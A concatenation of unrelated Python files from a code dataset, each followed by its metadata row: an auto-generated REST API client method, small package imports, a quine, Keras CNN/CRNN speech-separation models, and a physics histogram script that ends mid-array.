raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_saved_app_map_search_for_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `update_saved_app_map_search_for_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/savedappmapsearch/owned/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerSavedAppMapSearch', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 41.13431 | 409 | 0.594705 | 3,728 | 33,689 | 5.091738 | 0.055258 | 0.053103 | 0.035349 | 0.042093 | 0.959962 | 0.959488 | 0.958118 | 0.954114 | 0.952113 | 0.949373 | 0 | 0.016889 | 0.30927 | 33,689 | 818 | 410 | 41.184597 | 0.79884 | 0.35142 | 0 | 0.836406 | 0 | 0 | 0.175812 | 0.072976 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039171 | false | 0 | 0.009217 | 0 | 0.105991 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fff945fa87817ab4c079f884fd28aed87b6b8a9c | 50 | py | Python | 09/01/call_0.py | pylangstudy/201706 | f1cc6af6b18e5bd393cda27f5166067c4645d4d3 | [
"CC0-1.0"
] | null | null | null | 09/01/call_0.py | pylangstudy/201706 | f1cc6af6b18e5bd393cda27f5166067c4645d4d3 | [
"CC0-1.0"
] | 70 | 2017-06-01T11:02:51.000Z | 2017-06-30T00:35:32.000Z | 09/01/call_0.py | pylangstudy/201706 | f1cc6af6b18e5bd393cda27f5166067c4645d4d3 | [
"CC0-1.0"
] | null | null | null | import some_module_0
some_module_0.some_method()
| 12.5 | 27 | 0.86 | 9 | 50 | 4.222222 | 0.555556 | 0.526316 | 0.578947 | 0.789474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043478 | 0.08 | 50 | 3 | 28 | 16.666667 | 0.782609 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
f22bc65ad3f696435f9d5dac653350edcc51575b | 187 | py | Python | neater/__init__.py | ju-leon/torch-neuroevolution | bc5f96193fa086ec49bf1c5581ed2eb22d9ce0ac | [
"MIT"
] | 2 | 2021-07-05T11:10:53.000Z | 2021-09-29T17:36:19.000Z | neater/__init__.py | ju-leon/torch-neuroevolution | bc5f96193fa086ec49bf1c5581ed2eb22d9ce0ac | [
"MIT"
] | 3 | 2021-09-28T12:46:39.000Z | 2021-10-03T13:14:31.000Z | neater/__init__.py | ju-leon/torch-neuroevolution | bc5f96193fa086ec49bf1c5581ed2eb22d9ce0ac | [
"MIT"
] | null | null | null | from neater.network import Network
from neater.agent import Agent
from neater.strategies.neat.neat import Neat
from neater.strategies.strategy import Strategy
#from neat.ext import Node
| 26.714286 | 47 | 0.839572 | 28 | 187 | 5.607143 | 0.357143 | 0.254777 | 0.254777 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.112299 | 187 | 6 | 48 | 31.166667 | 0.945783 | 0.13369 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
f22bda97064e74612c557ec0e4824bc66794da33 | 169 | py | Python | david/typing/__init__.py | arthurTemporim/david | de4ea917e122a5ce99473b047e09e22a90641ff1 | [
"MIT"
] | 1 | 2020-01-07T01:15:43.000Z | 2020-01-07T01:15:43.000Z | david/typing/__init__.py | arthurTemporim/david | de4ea917e122a5ce99473b047e09e22a90641ff1 | [
"MIT"
] | null | null | null | david/typing/__init__.py | arthurTemporim/david | de4ea917e122a5ce99473b047e09e22a90641ff1 | [
"MIT"
] | null | null | null | from david.typing.message import Message
from david.typing.model import Model
from david.typing.module import Module
from david.typing.training_data import TrainingData
| 33.8 | 51 | 0.857988 | 25 | 169 | 5.76 | 0.4 | 0.25 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094675 | 169 | 4 | 52 | 42.25 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
f23b79e0abc6ffd100e51054efeb7dbb9c92dd4b | 100 | py | Python | basic/python/main.py | oglinuk/quines | 842866c7c51d15c3fa1a673a732ab88247aff4e5 | [
"Apache-2.0"
] | 1 | 2022-01-31T04:56:42.000Z | 2022-01-31T04:56:42.000Z | basic/python/main.py | oglinuk/quines | 842866c7c51d15c3fa1a673a732ab88247aff4e5 | [
"Apache-2.0"
] | null | null | null | basic/python/main.py | oglinuk/quines | 842866c7c51d15c3fa1a673a732ab88247aff4e5 | [
"Apache-2.0"
] | null | null | null | s="s={}{}{}{}print(s.format(chr(34),s,chr(34),chr(10)))"
print(s.format(chr(34),s,chr(34),chr(10)))
| 33.333333 | 56 | 0.58 | 22 | 100 | 2.636364 | 0.272727 | 0.344828 | 0.413793 | 0.517241 | 0.965517 | 0.965517 | 0.965517 | 0.965517 | 0.965517 | 0.965517 | 0 | 0.122449 | 0.02 | 100 | 2 | 57 | 50 | 0.469388 | 0 | 0 | 0 | 0 | 0.5 | 0.52 | 0.52 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 15 |
4b4857b1dca87c89e877a0c5d803c30deb6b96c2 | 9,071 | py | Python | models.py | yanis-k/BSSS | eb20de0572c6a4efc48ed0b354b39609de10e2ea | [
"MIT"
] | 1 | 2021-05-13T16:20:29.000Z | 2021-05-13T16:20:29.000Z | models.py | yanis-k/BSSS | eb20de0572c6a4efc48ed0b354b39609de10e2ea | [
"MIT"
] | null | null | null | models.py | yanis-k/BSSS | eb20de0572c6a4efc48ed0b354b39609de10e2ea | [
"MIT"
] | null | null | null | import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import Model
from tensorflow.keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D, Reshape, \
BatchNormalization, Input
from tensorflow.keras.layers import LSTM, Concatenate, LeakyReLU
from keras.losses import mean_squared_error
def custom_mse(x):
"""
Permutation Invariant Training MSE custom function loss.
Keras Implementation.
Used in PIT with the CRNN.
"""
def pit_loss(y_true, y_pred):
cost1 = mean_squared_error(y_pred[x], y_true[x])
def c1(): return tf.reduce_mean(cost1)
cost2 = mean_squared_error(y_pred[x - 1], y_true[x])
def c2(): return tf.reduce_mean(cost2)
result = tf.cond(tf.less(tf.reduce_mean(cost1), tf.reduce_mean(cost2)), c1, c2)
return result
return pit_loss
def bl_dnn_mimo(bins, hl_nodes):
"""
Baseline DNN model
Used as reference
[Speaker1, Speaker2] Output
:param bins: number of frequency bins
:param hl_nodes: number of hidden nodes
"""
inp_x = Input(shape=(bins,))
x = inp_x
x = Dense(hl_nodes)(x)
x = BatchNormalization()(x)
x = LeakyReLU()(x)
x = Dropout(0.4)(x)
x = Dense(hl_nodes)(x)
x = BatchNormalization()(x)
x = LeakyReLU()(x)
x = Dropout(0.4)(x)
x = Dense(hl_nodes)(x)
x = BatchNormalization()(x)
x = Dropout(0.4)(x)
out_l = Dense(bins, activation='linear', name="Out1")(x)
out_r = Dense(bins, activation='linear', name="Out2")(x)
model = Model(inputs=inp_x, outputs=[out_l, out_r])
model.compile(optimizer='adam', loss=keras.losses.mean_squared_error)
return model
def cnn_twin(bins, time_frames):
"""
CNN Model
"Twin" Implementation: Implemented w/ dilation rate (2)
Used as reference to twin-CRNN
[Speaker1, Speaker2] Output
:param bins: number of frequency bins
:param time_frames: number of consecutive time frames
"""
in_l = Input(shape=(bins, time_frames, 1))
x = in_l
filters = 8
for i in range(2):
x = Conv2D(filters=filters, kernel_size=(3, 3), padding='same', data_format='channels_last')(x)
x = BatchNormalization()(x)
x = LeakyReLU()(x)
x = Conv2D(filters=filters, kernel_size=(3, 3), padding='same', data_format='channels_last')(x)
x = BatchNormalization()(x)
x = LeakyReLU()(x)
x = MaxPooling2D(pool_size=(1, 2))(x)
x = Dropout(0.25)(x)
filters *= 2
in_r = Input(shape=(bins, time_frames, 1))
y = in_r
filters = 8
for i in range(2):
y = Conv2D(filters=filters, kernel_size=(3, 3), padding='same', dilation_rate=2, data_format='channels_last')(y)
y = BatchNormalization()(y)
y = LeakyReLU()(y)
y = Conv2D(filters=filters, kernel_size=(3, 3), padding='same', dilation_rate=2, data_format='channels_last')(y)
y = BatchNormalization()(y)
y = LeakyReLU()(y)
y = MaxPooling2D(pool_size=(1, 2))(y)
y = Dropout(0.25)(y)
filters *= 2
y = Concatenate(axis=3)([x, y])
filters = 64
for i in range(1):
y = Conv2D(filters=filters, kernel_size=(3, 3), padding='same', data_format='channels_last')(y)
y = BatchNormalization()(y)
y = LeakyReLU()(y)
y = Conv2D(filters=filters, kernel_size=(3, 3), padding='same', data_format='channels_last')(y)
y = BatchNormalization()(y)
y = LeakyReLU()(y)
y = MaxPooling2D(pool_size=(1, 2))(y)
y = Dropout(0.25)(y)
filters *= 2
y = Flatten()(y)
y = Dense(2048, activation=LeakyReLU())(y) # 2048
y = BatchNormalization()(y)
y = Dropout(0.4)(y)
out_l = Dense(bins * time_frames, activation='linear')(y)
out_l = Reshape((bins, time_frames, 1))(out_l)
out_r = Dense(bins * time_frames, activation='linear')(y)
out_r = Reshape((bins, time_frames, 1))(out_r)
model = Model(inputs=[in_l, in_r], outputs=[out_l, out_r])
model.compile(optimizer='adam', loss=keras.losses.mean_squared_error)
return model
def crnn_mimo(bins, time_frames):
"""
Twin CRNN (branch w/ dilation_rate = 2)
Multiple, yet common, Input
Multiple Outputs ([Speaker1, Speaker2])
:param bins: Num. of freq. bins
:param time_frames: Num. of consecutive Time Frames
"""
in_l = Input(shape=(bins, time_frames, 1))
x = in_l
filters = 64
for i in range(2):
x = Conv2D(filters=filters, kernel_size=(3, 3), padding='same', data_format='channels_last')(x)
x = BatchNormalization()(x)
x = LeakyReLU()(x)
x = Conv2D(filters=filters // 4, kernel_size=(3, 3), padding='same', data_format='channels_last')(x)
x = BatchNormalization()(x)
x = LeakyReLU()(x)
x = MaxPooling2D(pool_size=(2, 1))(x)
x = Dropout(0.25)(x)
filters //= 2
in_r = Input(shape=(bins, time_frames, 1))
y = in_r
filters = 64
for i in range(2):
y = Conv2D(filters=filters, kernel_size=(3, 3), padding='same', dilation_rate=2, data_format='channels_last')(y)
y = BatchNormalization()(y)
y = LeakyReLU()(y)
y = Conv2D(filters=filters // 4, kernel_size=(3, 3), padding='same', dilation_rate=2,
data_format='channels_last')(y)
y = BatchNormalization()(y)
y = LeakyReLU()(y)
y = MaxPooling2D(pool_size=(2, 1))(y)
y = Dropout(0.25)(y)
filters //= 2
y = Concatenate(axis=3)([x, y])
filters = 32
for i in range(1):
y = Conv2D(filters=filters, kernel_size=(3, 3), padding='same', data_format='channels_last')(y)
y = BatchNormalization()(y)
y = LeakyReLU()(y)
y = Conv2D(filters=filters // 2, kernel_size=(3, 3), padding='same', data_format='channels_last')(y)
y = BatchNormalization()(y)
y = LeakyReLU()(y)
y = MaxPooling2D(pool_size=(2, 1))(y)
y = Dropout(0.3)(y)
filters *= 2
y = Reshape((time_frames, 512))(y) # hardcoded, ((time_frames, bins/8*last_conv_filter)
y = LSTM(bins, return_sequences=True)(y)
y = Dropout(0.3)(y)
y = Flatten()(y)
out_l = Dense(bins * time_frames, activation='linear')(y)
out_l = Reshape((bins, time_frames, 1))(out_l)
out_r = Dense(bins * time_frames, activation='linear')(y)
out_r = Reshape((bins, time_frames, 1))(out_r)
model = Model([in_l, in_r], [out_l, out_r])
model.compile(optimizer='adam', loss=keras.losses.mean_squared_error)
return model
def crnn_mimo_PIT(bins, time_frames):
"""
Twin-CRNN
MIMO
Designed for Permutation Invariant Training
Makes use of custom_mse()
:param bins: Num of freq. bins
:param time_frames: Num of consecutive time frames
"""
in_l = Input(shape=(bins, time_frames, 1))
x = in_l
filters = 64
for i in range(2):
x = Conv2D(filters=filters, kernel_size=(3, 3), padding='same', data_format='channels_last')(x)
x = BatchNormalization()(x)
x = LeakyReLU()(x)
x = Conv2D(filters=filters // 4, kernel_size=(3, 3), padding='same', data_format='channels_last')(x)
x = BatchNormalization()(x)
x = LeakyReLU()(x)
x = MaxPooling2D(pool_size=(2, 1))(x)
x = Dropout(0.25)(x)
filters //= 2
in_r = Input(shape=(bins, time_frames, 1))
y = in_r
filters = 64
for i in range(2):
y = Conv2D(filters=filters, kernel_size=(3, 3), padding='same', dilation_rate=2, data_format='channels_last')(y)
y = BatchNormalization()(y)
y = LeakyReLU()(y)
y = Conv2D(filters=filters // 4, kernel_size=(3, 3), padding='same', dilation_rate=2,
data_format='channels_last')(y)
y = BatchNormalization()(y)
y = LeakyReLU()(y)
y = MaxPooling2D(pool_size=(2, 1))(y)
y = Dropout(0.25)(y)
filters //= 2
y = Concatenate(axis=3)([x, y])
filters = 32
for i in range(1):
y = Conv2D(filters=filters, kernel_size=(3, 3), padding='same', data_format='channels_last')(y)
y = BatchNormalization()(y)
y = LeakyReLU()(y)
y = Conv2D(filters=filters // 2, kernel_size=(3, 3), padding='same', data_format='channels_last')(y)
y = BatchNormalization()(y)
y = LeakyReLU()(y)
y = MaxPooling2D(pool_size=(2, 1))(y)
y = Dropout(0.3)(y)
filters *= 2
y = Reshape((time_frames, 512))(y) # hardcoded, ((time_frames, bins/8*last_conv_filter)
y = LSTM(bins, return_sequences=True)(y)
y = Dropout(0.3)(y)
y = Flatten()(y)
out_l = Dense(bins * time_frames, activation='linear')(y)
out_l = Reshape((bins, time_frames, 1), name='out_l')(out_l)
out_r = Dense(bins * time_frames, activation='linear')(y)
out_r = Reshape((bins, time_frames, 1), name='out_r')(out_r)
model = Model(inputs=[in_l, in_r], outputs=[out_l, out_r])
losses = {'out_l': custom_mse(0), 'out_r': custom_mse(1)}
model.compile(loss=losses, optimizer='adam')
return model
| 33.72119 | 120 | 0.609084 | 1,293 | 9,071 | 4.121423 | 0.100541 | 0.018015 | 0.05517 | 0.040533 | 0.80578 | 0.774629 | 0.764121 | 0.761118 | 0.761118 | 0.761118 | 0 | 0.031829 | 0.238011 | 9,071 | 268 | 121 | 33.847015 | 0.739149 | 0.103186 | 0 | 0.824468 | 0 | 0 | 0.049893 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042553 | false | 0 | 0.031915 | 0.010638 | 0.106383 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4b612e60e6a5ecce238a0ae0e68bae5fdf58faf6 | 59,366 | py | Python | optimization/second_sdEta_mjj_optimization/lumi_and_kin_plots/four_cuts_lum150/Output/Histos/MadAnalysis5job_0/selection_12.py | sheride/axion_pheno | 7d3fc08f5ae5b17a3500eba19a2e43f87f076ce5 | [
"MIT"
] | null | null | null | optimization/second_sdEta_mjj_optimization/lumi_and_kin_plots/four_cuts_lum150/Output/Histos/MadAnalysis5job_0/selection_12.py | sheride/axion_pheno | 7d3fc08f5ae5b17a3500eba19a2e43f87f076ce5 | [
"MIT"
] | null | null | null | optimization/second_sdEta_mjj_optimization/lumi_and_kin_plots/four_cuts_lum150/Output/Histos/MadAnalysis5job_0/selection_12.py | sheride/axion_pheno | 7d3fc08f5ae5b17a3500eba19a2e43f87f076ce5 | [
"MIT"
] | null | null | null | def selection_12():
# Library import
import numpy
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
# Library version
matplotlib_version = matplotlib.__version__
numpy_version = numpy.__version__
# Histo binning
xBinning = numpy.linspace(0.0,2000.0,401,endpoint=True)
# Creating data sequence: middle of each bin
xData = numpy.array([2.5,7.5,12.5,17.5,22.5,27.5,32.5,37.5,42.5,47.5,52.5,57.5,62.5,67.5,72.5,77.5,82.5,87.5,92.5,97.5,102.5,107.5,112.5,117.5,122.5,127.5,132.5,137.5,142.5,147.5,152.5,157.5,162.5,167.5,172.5,177.5,182.5,187.5,192.5,197.5,202.5,207.5,212.5,217.5,222.5,227.5,232.5,237.5,242.5,247.5,252.5,257.5,262.5,267.5,272.5,277.5,282.5,287.5,292.5,297.5,302.5,307.5,312.5,317.5,322.5,327.5,332.5,337.5,342.5,347.5,352.5,357.5,362.5,367.5,372.5,377.5,382.5,387.5,392.5,397.5,402.5,407.5,412.5,417.5,422.5,427.5,432.5,437.5,442.5,447.5,452.5,457.5,462.5,467.5,472.5,477.5,482.5,487.5,492.5,497.5,502.5,507.5,512.5,517.5,522.5,527.5,532.5,537.5,542.5,547.5,552.5,557.5,562.5,567.5,572.5,577.5,582.5,587.5,592.5,597.5,602.5,607.5,612.5,617.5,622.5,627.5,632.5,637.5,642.5,647.5,652.5,657.5,662.5,667.5,672.5,677.5,682.5,687.5,692.5,697.5,702.5,707.5,712.5,717.5,722.5,727.5,732.5,737.5,742.5,747.5,752.5,757.5,762.5,767.5,772.5,777.5,782.5,787.5,792.5,797.5,802.5,807.5,812.5,817.5,822.5,827.5,832.5,837.5,842.5,847.5,852.5,857.5,862.5,867.5,872.5,877.5,882.5,887.5,892.5,897.5,902.5,907.5,912.5,917.5,922.5,927.5,932.5,937.5,942.5,947.5,952.5,957.5,962.5,967.5,972.5,977.5,982.5,987.5,992.5,997.5,1002.5,1007.5,1012.5,1017.5,1022.5,1027.5,1032.5,1037.5,1042.5,1047.5,1052.5,1057.5,1062.5,1067.5,1072.5,1077.5,1082.5,1087.5,1092.5,1097.5,1102.5,1107.5,1112.5,1117.5,1122.5,1127.5,1132.5,1137.5,1142.5,1147.5,1152.5,1157.5,1162.5,1167.5,1172.5,1177.5,1182.5,1187.5,1192.5,1197.5,1202.5,1207.5,1212.5,1217.5,1222.5,1227.5,1232.5,1237.5,1242.5,1247.5,1252.5,1257.5,1262.5,1267.5,1272.5,1277.5,1282.5,1287.5,1292.5,1297.5,1302.5,1307.5,1312.5,1317.5,1322.5,1327.5,1332.5,1337.5,1342.5,1347.5,1352.5,1357.5,1362.5,1367.5,1372.5,1377.5,1382.5,1387.5,1392.5,1397.5,1402.5,1407.5,1412.5,1417.5,1422.5,1427.5,1432.5,1437.5,1442.5,1447.5,1452.5,1457.5,1462.5,1467.5,1472.5,1477.5,1482.5,1487.5,1492.5,1497.5,1502.5,1507.5,1512.5,1517.5,1522.5,1527.5,1532.5,1537.5,1542.5,1547.5,1552.5,1557.5,1562.5,1567.5,1572.5,1577.5,1582.5,1587.5,1592.5,1597.5,1602.5,1607.5,1612.5,1617.5,1622.5,1627.5,1632.5,1637.5,1642.5,1647.5,1652.5,1657.5,1662.5,1667.5,1672.5,1677.5,1682.5,1687.5,1692.5,1697.5,1702.5,1707.5,1712.5,1717.5,1722.5,1727.5,1732.5,1737.5,1742.5,1747.5,1752.5,1757.5,1762.5,1767.5,1772.5,1777.5,1782.5,1787.5,1792.5,1797.5,1802.5,1807.5,1812.5,1817.5,1822.5,1827.5,1832.5,1837.5,1842.5,1847.5,1852.5,1857.5,1862.5,1867.5,1872.5,1877.5,1882.5,1887.5,1892.5,1897.5,1902.5,1907.5,1912.5,1917.5,1922.5,1927.5,1932.5,1937.5,1942.5,1947.5,1952.5,1957.5,1962.5,1967.5,1972.5,1977.5,1982.5,1987.5,1992.5,1997.5])
# Creating weights for histo: y13_PT_0
y13_PT_0_weights = numpy.array([0.184233745582,0.537348599613,0.782993643722,1.16681392202,1.6427506231,1.96516035287,2.3182750569,2.87097659365,3.25479627194,3.27015025907,4.31414038404,4.25273043551,4.51372721675,6.01830395566,5.89548105861,5.92618603287,6.58635797954,7.32329236187,8.56687081954,8.9813969721,8.95069199784,9.64156741877,10.485972211,11.8677260529,11.0386737478,12.3129571797,12.466486551,12.8656587164,14.8308190693,14.7540551337,15.8287517329,15.7980467586,16.7806209351,18.3619646096,17.8399650472,19.1449639533,19.7590784386,21.2943571518,20.7109476408,22.1234064569,22.6914559808,23.6279801958,24.4109795396,23.2748654918,24.8869141406,25.0097340377,24.1039147969,25.4856686388,27.2512421589,26.3147179439,26.3761428924,27.6350618372,27.2973071203,28.8018808593,28.8479458206,29.001470692,29.9533398941,29.8612249713,30.3678645467,30.0301098298,29.8458799842,29.1396505761,28.9093557692,29.3699303831,29.7077001,26.8674224806,27.5122419402,25.5624385744,26.0537331627,27.2051921975,25.3014387932,25.8387833428,25.7313234329,24.7794392307,23.3669804146,24.1806847326,24.1346197712,23.0445706848,22.829635865,23.1674055819,22.7682259165,22.3997512253,22.2001763926,21.4478820231,20.4038978982,20.8337675378,21.5707019202,19.5441286188,20.3271279625,19.0374890434,18.6997343265,19.6516035287,18.6536693651,18.6997343265,18.4694395195,17.1337356391,17.6250302273,16.074391527,16.6731610251,16.0283415656,16.427506231,16.2739813597,16.1818664369,15.0457523892,15.1532272991,14.2474125583,14.9843469406,14.4623518782,13.9403568157,13.8942978543,14.0171207513,13.4183602532,13.3876552789,13.4183602532,12.3283111668,12.1440768213,12.2976046926,12.1594293084,12.4050751025,11.9291375014,12.2515472312,11.652786733,11.4685523875,11.8523735657,11.3457309904,11.2843195419,10.6395015823,11.1154376834,10.3017393654,9.84115425148,10.5780901338,9.68762638016,10.5780901338,9.82580176435,9.33451167613,9.6108624445,9.79509679009,8.78181013939,9.58015597024,8.39799046109,8.6896937166,7.84528892435,7.90670037287,8.32122652543,8.16769715412,8.10628570559,7.81458245008,7.81458245008,7.10835304202,7.27723490047,6.9548251707,7.09300055489,7.55358566884,6.9548251707,6.63241544094,6.40212363396,6.60171046667,6.81664978652,5.74195318729,6.00295146853,6.55565150528,6.67847440233,6.64776942807,5.81871712295,5.66518925163,5.52701386745,5.94154002,5.58842531597,5.68054173876,5.57307132884,5.29672056047,5.43489594466,5.32742703473,5.25066309907,5.23531061194,5.23531061194,4.62119762667,4.45231576822,4.48302224248,4.95895984357,4.62119762667,4.75937301086,4.22202396124,4.65190260093,4.25273043551,4.11455505132,4.14526002559,4.22202396124,4.0070846414,3.80749780869,3.86890925721,3.89961573148,3.60791097597,3.76144034729,4.22202396124,3.74608636016,3.70002889876,3.70002889876,3.42367813039,3.56185351458,3.53114704031,3.51579455318,3.60791097597,2.91703555504,3.0398569521,3.08591591349,3.22409129768,3.07056342636,2.76350618372,2.87097659365,2.67138976093,2.41039147969,2.87097659365,3.10126840062,2.64068478667,2.85562410651,2.53321437675,2.79421265799,2.42574546682,2.42574546682,2.56392085101,2.53321437675,2.30292256977,2.21080464698,2.13404071132,2.30292256977,2.16474718558,2.7020947352,2.21080464698,2.16474718558,2.13404071132,1.91910139147,1.90374890434,1.79627999442,2.21080464698,2.0265718014,1.94980786574,2.11868822419,1.59669316171,1.90374890434,1.81163248155,1.71951455876,1.88839641721,1.85768994295,1.67345709737,2.19545215985,1.65810461023,1.45851747752,1.56598668744,1.3510476676,1.24357800768,1.6427506231,1.76557352016,1.6427506231,1.42781175326,1.42781175326,1.59669316171,1.38175339186,1.41245896613,1.56598668744,1.50457523892,1.44316469039,1.16681392202,1.48922305178,0.967227389303,0.982580176435,1.16681392202,1.24357800768,1.09004983636,1.3510476676,1.21287243341,1.21287243341,1.13610834775,1.22822522054,1.0132857507,0.951874602171,0.997932963567,1.3510476676,0.859757579381,1.10540262349,1.18216670915,0.93652166504,0.997932963567,0.782993643722,0.782993643722,0.997932963567,1.02863868783,0.844404792249,0.921168877908,0.905816090776,0.875110516512,0.782993643722,0.736935132326,0.675523833799,0.782993643722,0.829052005117,0.875110516512,0.736935132326,0.736935132326,0.614112535272,0.721582345194,0.844404792249,0.844404792249,0.675523833799,0.675523833799,0.76764070659,0.460584513954,0.76764070659,0.706229558063,0.475937301086,0.644818259535,0.660171046667,0.491290088217,0.59875974814,0.614112535272,0.583406961008,0.629465472404,0.42987878969,0.59875974814,0.59875974814,0.491290088217,0.644818259535,0.59875974814,0.706229558063,0.399173215427,0.368467491163,0.506642875349,0.460584513954,0.491290088217,0.491290088217,0.491290088217,0.445231576822,0.445231576822,0.353114704031,0.399173215427,0.322409129768,0.475937301086,0.353114704031,0.460584513954,0.383820428295,0.42987878969,0.475937301086,0.353114704031,0.368467491163,0.414526002559,0.307056342636,0.322409129768,0.414526002559,0.414526002559,0.399173215427,0.353114704031,0.214939469845,0.353114704031,0.353114704031,0.3377619169,0.260997831241,0.276350618372,0.260997831241,0.307056342636,0.307056342636,0.353114704031,0.307056342636,0.16888095845,0.276350618372,0.307056342636,0.291703555504,0.260997831241,0.276350618372,0.307056342636,0.214939469845,0.107469704923,0.291703555504,0.276350618372,0.214939469845,0.260997831241,0.260997831241,0.260997831241,0.230292256977,0.214939469845,0.16888095845,0.214939469845,0.230292256977,0.245645044109,0.153528171318,0.199586532713,0.138175339186,0.122822522054,0.122822522054,0.0921168877908,0.214939469845,0.16888095845,0.107469704923,0.276350618372,0.245645044109,0.16888095845,0.214939469845,0.16888095845,0.245645044109,0.230292256977,0.122822522054])
# Creating weights for histo: y13_PT_1
y13_PT_1_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0912968591919,0.0,0.0,0.0454653083971,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0454926924109,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.